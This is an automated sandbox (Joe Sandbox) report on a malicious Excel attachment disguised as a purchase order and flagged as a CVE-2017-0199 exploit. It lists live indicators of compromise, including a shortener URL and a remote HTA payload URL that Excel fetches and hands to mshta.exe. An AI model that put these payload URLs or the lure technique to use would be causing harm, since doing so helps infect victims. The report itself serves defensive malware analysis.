Source: global trafficHTTP traffic detected: GET /rules/excel.exe-Production-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)Host: otelrules.svc.static.microsoft
Source: global trafficHTTP traffic detected: GET /xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.123.32
Source: global trafficDNS traffic detected: DNS query: agr.my
Source: global trafficDNS traffic detected: DNS query: otelrules.svc.static.microsoft
Source: PURCHASE ORDER 517-2025.xla.xlsxString found in binary or memory: https://agr.my/vJcD8F?&silk=enthusiastic
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
Source: unknownHTTPS traffic detected: 147.79.86.93:443 -> 192.168.2.7:49697 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.41:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: PURCHASE ORDER 517-2025.xla.xlsxOLE indicator, VBA macros: true
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'MBD001A3106/\x1Ole' : https://agr.my/vJcD8F?&silk=enthusiasticm=V&2G"aFzBv+\7dcUkO{u,8K| sf'.Q\R<eJ1rlmdht!c<%)Fw`7^6eLLyklcWgQbVIv9OQFIJt6VUMHZGTpa4tV5k0bivr6OqxyUCfDUv71OQ6Fn89wBodWoYxY3PDmNL8FqnGSiekrbLeCQx6f4EZMajhTVxArQoC9XTYtchiizBP1dO3CpAh9072utPLqr1JfjPyidRlP7a2gsgTJ25ywynXrmOKCKLE\"txQUB<z_VmkJ_
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEWindow title found: microsoft excel okexcel cannot open the file 'purchase order 517-2025.xla.xlsx' because the file format or file extension is not valid. verify that the file has not been corrupted and that the file extension matches the format of the file.
Source: classification engineClassification label: mal56.expl.winXLSX@6/4@2/3
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\Desktop\~$PURCHASE ORDER 517-2025.xla.xlsxJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user~1\AppData\Local\Temp\{12304E56-B555-45A4-850D-ECFE222C2061} - OProcSessId.datJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxOLE indicator, Workbook stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxVirustotal: Detection: 28%
Source: PURCHASE ORDER 517-2025.xla.xlsxReversingLabs: Detection: 22%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PURCHASE ORDER 517-2025.xla.xlsx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\mshta.exe -EmbeddingJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: c2r32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3EE60F5C-9BAD-4CD8-8E21-AD2D001D06EB}\InprocServer32Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxStatic file information: File size 1064448 > 1048576
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxInitial sample: OLE indicators encrypted = True
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\splwow64.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'MBD001A3105/Package' entropy: 7.99329796897 (max. 8.0)
Source: PURCHASE ORDER 517-2025.xla.xlsxStream path 'Workbook' entropy: 7.99208997378 (max. 8.0)
Source: C:\Windows\splwow64.exeWindow / User API: threadDelayed 822Jump to behavior
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeLast function: Thread delayed
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\splwow64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information queried: ProcessInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		Valid Accounts13
Exploitation for Client Execution		1
Scripting		1
Process Injection		2
Masquerading		OS Credential Dumping1
Process Discovery		Remote Services1
Email Collection		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		1
DLL Side-Loading		1
Virtualization/Sandbox Evasion		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Process Injection		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Obfuscated Files or Information		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets2
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1649448 Sample: PURCHASE ORDER 517-2025.xla.xlsx Startdate: 26/03/2025 Architecture: WINDOWS Score: 56 19 star-azurefd-prod.trafficmanager.net 2->19 21 shed.dual-low.s-part-0013.t-0009.t-msedge.net 2->21 23 4 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Document exploit detected (process start blacklist hit) 2->33 35 Sigma detected: Suspicious Microsoft Office Child Process 2->35 7 EXCEL.EXE 232 55 2->7         started        11 EXCEL.EXE 45 43 2->11         started        signatures3 process4 dnsIp5 25 s-part-0013.t-0009.t-msedge.net 13.107.246.41, 443, 49699, 49700 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->25 27 agr.my 147.79.86.93, 443, 49697 EKSENBILISIMTR United States 7->27 29 172.245.123.32, 49698, 80 AS-COLOCROSSINGUS United States 7->29 17 C:\...\~$PURCHASE ORDER 517-2025.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
PURCHASE ORDER 517-2025.xla.xlsx29%VirustotalBrowse
PURCHASE ORDER 517-2025.xla.xlsx22%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royal0%Avira URL Cloudsafe
https://agr.my/vJcD8F?&silk=enthusiastic0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
agr.my
147.79.86.93
truefalse
    		high
    s-part-0013.t-0009.t-msedge.net
    		13.107.246.41
    		truefalse
      		high
      s-0005.dual-s-dc-msedge.net
      		52.123.131.14
      		truefalse
        		high
        otelrules.svc.static.microsoft
        		unknown
        		unknownfalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
            		high
            http://172.245.123.32/xampp/kobs/kukmakingbestcrzythingsinmylife.hta?&light=royalfalse
            • Avira URL Cloud: safe
            		unknown
            https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
              		high
              https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                		high
                https://agr.my/vJcD8F?&silk=enthusiasticfalse
                • Avira URL Cloud: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                147.79.86.93
                		agr.myUnited States
                		208485EKSENBILISIMTRfalse
                13.107.246.41
                		s-part-0013.t-0009.t-msedge.netUnited States
                		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                172.245.123.32
                		unknownUnited States
                		36352AS-COLOCROSSINGUSfalse

                General Information

                Joe Sandbox version:42.0.0 Malachite
                Analysis ID:1649448
                Start date and time:2025-03-26 19:34:17 +01:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 5m 2s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:19
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • GSI enabled (VBA)
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:PURCHASE ORDER 517-2025.xla.xlsx
                Detection:MAL
                Classification:mal56.expl.winXLSX@6/4@2/3
                EGA Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Active ActiveX Object
                • Active ActiveX Object
                • Scroll down
                • Close Viewer
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                • Excluded IPs from analysis (whitelisted): 52.109.0.91, 52.109.8.36, 23.9.183.29, 23.210.73.6, 23.210.73.5, 104.208.16.90, 20.42.73.28, 52.123.131.14, 20.190.151.132, 20.12.23.50
                • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, roaming.officeapps.live.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, onedscolprdcus14.centralus.cloudapp.azure.com, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsv
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtCreateKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtReadVirtualMemory calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                14:36:17API Interceptor851x Sleep call for process: splwow64.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                147.79.86.93List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                  242508-02.docx.docGet hashmaliciousUnknownBrowse
                    List_242508-02.docx.docGet hashmaliciousUnknownBrowse
                      242508-02.docx.docGet hashmaliciousUnknownBrowse
                        ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                          ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                            ORDER 517-2025.xla.xlsxGet hashmaliciousUnknownBrowse
                              MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                Merged documents.docx.docGet hashmaliciousUnknownBrowse
                                  MDRHZBOL2477518 CO.xlsGet hashmaliciousUnknownBrowse
                                    13.107.246.41http://www.surveymonkey.com/tr/v1/te/PUEIZHbYTJGrZEIkVMWlCoicdktJQxDgUh5D5mhe1V5RrTmuIdynx7PnFHXRUx9slMgQjvZdyUWqhr_2Bl49oNXjy3TOleTjKMKR6WbsGcrstlT2syBMlSkW7U5aKlKcBD9NFqJqrxGyODSWJJr6_2BMbXsKkDA_2F0ep4iw23xw6huuM_3DGet hashmaliciousUnknownBrowse
                                    • www.eand.com/en/index.html
                                    02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                    • www.mvphealthcare.com/
                                    02-11-2024 MVP.htmlGet hashmaliciousUnknownBrowse
                                    • www.mvphealthcare.com/
                                    http://y84x.mjt.lu/lnk/CAAABPdweCoAAAAAAAAAAAVG8MwAAAA6pnMAAAAAAAvpOQBlhIO4-ImJ1UImRBC5CNVIkLSaswAL-7Q/2/r-vXj7XjX0azsD7QNKNH-A/aHR0cHM6Ly9hcHBjZW50ZXIubXMvaW52aXRhdGlvbnMvb3JnL2IxNjM2ZDYzMTE0YTM0MjBkYWFmNTg4YTE5N2Y0N2MxNGY4ZDViNWMyM2ZjM2RhYTgxMWM0ODgwOWM1ZTZkNjQGet hashmaliciousUnknownBrowse
                                    • appcenter.ms/
                                    http://url7816.acetaxi.com/ls/click?upn=k9eqZnPBEZmPVPka3LxS61O1ksdCJOgznvtiwccqzi2-2BneqvfCXEJ-2FQj-2BZo7snmCwDunBahf2LYhfs7qQp7-2F23xLStq-2BkxJ70xqVvyXzkWM-3D8Cie_z5TGfmB4A65PPE2hDgRdrx6OZsZ3AmrJLHJ0M9ePWeHP5QDTWsAVp117uXam9dNn-2BGSxHeP-2BInRF-2Bgy2v-2FXBPODjmLss6NRV2RYsUYD7um77hgLl0ET9pPGTHF-2BQ1m6-2Fw7-2B-2B9DJOpakZj874YLC8uUep0F7rZMDlM46gmHmQqqAeCV477M0h2b07T2IcXu0hzUcKftN0UG2jhPq8qo00cQl0gvOLl-2BjChyaOdLpENao-3DGet hashmaliciousUnknownBrowse
                                    • twiliosolutions.azurefd.net/
                                    172.245.123.32givemebestthingsforgivemebest.htaGet hashmaliciousCobalt Strike, FormBookBrowse
